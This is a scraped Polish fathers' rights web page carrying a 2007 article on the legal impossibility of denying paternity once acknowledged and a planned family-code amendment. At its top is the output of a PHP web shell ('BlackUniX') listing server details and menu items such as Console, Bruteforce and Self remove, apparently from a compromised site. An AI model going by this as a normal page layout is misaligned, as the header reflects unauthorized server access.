W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 01:54:22
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.91.246
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Zaprzeczenie ojcostwa.
12.07.2007.
Zaczęło się od kłótni. Andrzej usłyszał, że ukochany Adrianek nie jest jego. Że Anna chce być z kimś innym i że zabiera dziecko. Nie mógł uwierzyć. Problem w tym, że kobieta nie tylko podpisała oświadczenie, ale zgodziła się na badanie DNA. Jej słowa się potwierdziły.
"Zabrała mi wszystko. Dziecko, rodzinę i pieniądze. Bo mimo że od pięciu lat mieszka z ojcem dziecka, to ja płacę alimenty. Poszedłem z papierami do Urzędu Stanu Cywilnego zaprzeczyć ojcostwu, ale usłyszałem, że to niemożliwe. Skoro uznałem dziecko, to klamka zapadła" - mówi rozżalony Andrzej.
Mariusz Kopeć, kierownik USC w Poznaniu, rozkłada bezradnie ręce i potwierdza, że Andrzej nie jest przypadkiem odosobnionym. "Nie ma tygodnia, żeby kilku panów nie pytało, jakie są możliwości zaprzeczenia ojcostwa. Nie ma. Tak odpowiedzą im urzędnicy we wszystkich trzech tysiącach urzędów stanu cywilnego w Polsce" - mówi urzędnik.

Nowelizacja kodeksu rodzinnego i opiekuńczego zmierza jednak do rzucenia mężczyznom koła ratunkowego. "Jaki będzie ostateczny kształt nowelizacji, nie wiadomo, bo Sejm może ją zmienić, Senat dołożyć swoje poprawki, no i wszystko zależy jeszcze od polityki, czyli jaka opcja rządzi" - mówi sędzia Sławomir Różycki z Ministerstwa Sprawiedliwości.

Prace idą jednak w kierunku zmiany oświadczenia woli w sprawie uznania dziecka za własne na oświadczenie wiedzy. "To oznacza, że jeśli mężczyzna uzna ojcostwo za niezgodnie ze stanem rzeczywistym, to będzie mógł wnieść o jego unieważnienie" - wyjaśnia sędzia Różycki.

(...)

Teoretycznie każdy mężczyzna mający dowody na to, że nie jest biologicznym ojcem, może zgłosić sprawę w... prokuraturze, która powinna zająć się ustaleniem stanu faktycznego zgodnie z "prawdą genetyczną". Ale to tylko teoria. "Niestety, nie słyszałem, aby komuś udało się przekonać prokuratora do takiego działania. Prokurator bierze kodeks rodzinny i opiekuńczy, cytuje przepis i sprawa zakreśla koło, kończąc się w punkcie wyjścia" - wyjaśnia doświadczony sędzia wydziału rodzinnego jednego z polskich sądów.

Tymczasem z badań przeprowadzanych w różnych okresach przez różne ośrodki badawcze powtarza się ten sam wynik. Cztery procenty ojców w krajach Europy i Ameryki Północnej wychowuje nie swoje dzieci, nie wiedząc o tym. W Polsce to armia kilkudziesięciu tysięcy mężczyzn.

Czytaj całość w dzienniku.pl


 
« poprzedni artykuł

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.